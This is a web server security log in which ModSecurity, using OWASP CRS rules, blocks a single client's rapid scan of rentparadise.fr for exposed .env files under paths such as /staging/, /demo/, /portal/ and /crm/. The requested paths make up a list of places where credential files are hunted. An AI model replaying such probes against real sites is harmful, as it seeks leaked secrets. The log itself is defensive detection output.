[Mon May 11 13:32:20.989371 2026] [security2:error] [pid 1320674:tid 1320696] [client 213.209.159.223:40794] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/dev/.env"] [unique_id "agG-RKO9RdIr1DwxYR1vjgAAAMY"]
[Mon May 11 13:32:21.589910 2026] [security2:error] [pid 1319953:tid 1319974] [client 213.209.159.223:40786] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-ROSQ-m-m0ukSShtd2gAAAVM"]
[Mon May 11 13:32:21.606533 2026] [security2:error] [pid 1320674:tid 1320696] [client 213.209.159.223:40794] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-RKO9RdIr1DwxYR1vjgAAAMY"]
[Mon May 11 13:32:22.316702 2026] [security2:error] [pid 1320398:tid 1320402] [client 213.209.159.223:40808] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-RuJEyNRN152ArORl1gAAAEI"]
[Mon May 11 13:32:22.316921 2026] [security2:error] [pid 1320398:tid 1320402] [client 213.209.159.223:40808] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-RuJEyNRN152ArORl1gAAAEI"]
[Mon May 11 13:32:22.642086 2026] [security2:error] [pid 1319953:tid 1319977] [client 213.209.159.223:40818] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-RuSQ-m-m0ukSShtd3AAAAVY"]
[Mon May 11 13:32:22.642312 2026] [security2:error] [pid 1319953:tid 1319977] [client 213.209.159.223:40818] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/server/.env"] [unique_id "agG-RuSQ-m-m0ukSShtd3AAAAVY"]
[Mon May 11 13:32:22.923258 2026] [security2:error] [pid 1320398:tid 1320402] [client 213.209.159.223:40808] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-RuJEyNRN152ArORl1gAAAEI"]
[Mon May 11 13:32:22.979285 2026] [security2:error] [pid 1319953:tid 1319979] [client 213.209.159.223:11008] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-RuSQ-m-m0ukSShtd3QAAAVg"]
[Mon May 11 13:32:22.979744 2026] [security2:error] [pid 1319953:tid 1319979] [client 213.209.159.223:11008] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-RuSQ-m-m0ukSShtd3QAAAVg"]
[Mon May 11 13:32:23.601661 2026] [security2:error] [pid 1319953:tid 1319977] [client 213.209.159.223:40818] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-RuSQ-m-m0ukSShtd3AAAAVY"]
[Mon May 11 13:32:23.668907 2026] [security2:error] [pid 1319998:tid 1320018] [client 213.209.159.223:11010] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-R6t2WtvoFr7xvGyw1gAAAJI"]
[Mon May 11 13:32:23.669297 2026] [security2:error] [pid 1319998:tid 1320018] [client 213.209.159.223:11010] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env.save"] [unique_id "agG-R6t2WtvoFr7xvGyw1gAAAJI"]
[Mon May 11 13:32:23.947577 2026] [security2:error] [pid 1319953:tid 1319979] [client 213.209.159.223:11008] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-RuSQ-m-m0ukSShtd3QAAAVg"]
[Mon May 11 13:32:24.567660 2026] [security2:error] [pid 1319998:tid 1320018] [client 213.209.159.223:11010] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-R6t2WtvoFr7xvGyw1gAAAJI"]
[Mon May 11 13:32:24.734690 2026] [security2:error] [pid 1319998:tid 1320020] [client 213.209.159.223:11032] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-SKt2WtvoFr7xvGyw1wAAAJQ"]
[Mon May 11 13:32:24.734913 2026] [security2:error] [pid 1319998:tid 1320020] [client 213.209.159.223:11032] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-SKt2WtvoFr7xvGyw1wAAAJQ"]
[Mon May 11 13:32:25.300461 2026] [security2:error] [pid 1320398:tid 1320416] [client 213.209.159.223:11044] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-SeJEyNRN152ArORl2wAAAFA"]
[Mon May 11 13:32:25.300633 2026] [security2:error] [pid 1320398:tid 1320416] [client 213.209.159.223:11044] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/staging/.env"] [unique_id "agG-SeJEyNRN152ArORl2wAAAFA"]
[Mon May 11 13:32:25.327487 2026] [security2:error] [pid 1319998:tid 1320020] [client 213.209.159.223:11032] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-SKt2WtvoFr7xvGyw1wAAAJQ"]
[Mon May 11 13:32:25.896635 2026] [security2:error] [pid 1320398:tid 1320416] [client 213.209.159.223:11044] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-SeJEyNRN152ArORl2wAAAFA"]
[Mon May 11 13:32:27.362423 2026] [security2:error] [pid 1319998:tid 1320022] [client 213.209.159.223:11104] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-S6t2WtvoFr7xvGyw2gAAAJY"]
[Mon May 11 13:32:27.362656 2026] [security2:error] [pid 1319998:tid 1320022] [client 213.209.159.223:11104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-S6t2WtvoFr7xvGyw2gAAAJY"]
[Mon May 11 13:32:27.976579 2026] [security2:error] [pid 1319885:tid 1319930] [client 213.209.159.223:11118] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-S1chVQ3tCn0m9Oo0IgAAARU"]
[Mon May 11 13:32:27.976991 2026] [security2:error] [pid 1319885:tid 1319930] [client 213.209.159.223:11118] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/.env.production"] [unique_id "agG-S1chVQ3tCn0m9Oo0IgAAARU"]
[Mon May 11 13:32:28.047392 2026] [security2:error] [pid 1319998:tid 1320022] [client 213.209.159.223:11104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-S6t2WtvoFr7xvGyw2gAAAJY"]
[Mon May 11 13:32:28.104028 2026] [security2:error] [pid 1319953:tid 1319961] [client 213.209.159.223:11130] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-TOSQ-m-m0ukSShtd4gAAAUY"]
[Mon May 11 13:32:28.104287 2026] [security2:error] [pid 1319953:tid 1319961] [client 213.209.159.223:11130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-TOSQ-m-m0ukSShtd4gAAAUY"]
[Mon May 11 13:32:28.588477 2026] [security2:error] [pid 1319885:tid 1319930] [client 213.209.159.223:11118] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-S1chVQ3tCn0m9Oo0IgAAARU"]
[Mon May 11 13:32:28.654432 2026] [security2:error] [pid 1319886:tid 1319917] [client 213.209.159.223:11140] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-TKy-5-wpj6Sx56Z0sQAAAAw"]
[Mon May 11 13:32:28.654754 2026] [security2:error] [pid 1319886:tid 1319917] [client 213.209.159.223:11140] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/demo/.env"] [unique_id "agG-TKy-5-wpj6Sx56Z0sQAAAAw"]
[Mon May 11 13:32:28.764022 2026] [security2:error] [pid 1319953:tid 1319961] [client 213.209.159.223:11130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-TOSQ-m-m0ukSShtd4gAAAUY"]
[Mon May 11 13:32:28.823087 2026] [security2:error] [pid 1319998:tid 1320023] [client 213.209.159.223:11146] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-TKt2WtvoFr7xvGyw2wAAAJc"]
[Mon May 11 13:32:28.823341 2026] [security2:error] [pid 1319998:tid 1320023] [client 213.209.159.223:11146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-TKt2WtvoFr7xvGyw2wAAAJc"]
[Mon May 11 13:32:29.245015 2026] [security2:error] [pid 1319886:tid 1319917] [client 213.209.159.223:11140] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-TKy-5-wpj6Sx56Z0sQAAAAw"]
[Mon May 11 13:32:29.300727 2026] [security2:error] [pid 1319953:tid 1319968] [client 213.209.159.223:11152] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-TeSQ-m-m0ukSShtd4wAAAU0"]
[Mon May 11 13:32:29.300941 2026] [security2:error] [pid 1319953:tid 1319968] [client 213.209.159.223:11152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/portal/.env"] [unique_id "agG-TeSQ-m-m0ukSShtd4wAAAU0"]
[Mon May 11 13:32:29.592014 2026] [security2:error] [pid 1319998:tid 1320023] [client 213.209.159.223:11146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "mail.rentparadise.fr"] [uri "/index.php"] [unique_id "agG-TKt2WtvoFr7xvGyw2wAAAJc"]
[Mon May 11 13:32:29.896673 2026] [security2:error] [pid 1319953:tid 1319968] [client 213.209.159.223:11152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agG-TeSQ-m-m0ukSShtd4wAAAU0"]
[Mon May 11 13:32:30.297901 2026] [security2:error] [pid 1320674:tid 1320710] [client 213.209.159.223:11190] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.rentparadise.fr"] [uri "/crm/.env"] [unique_id "agG-TqO9RdIr1DwxYR1vmAAAANU"]
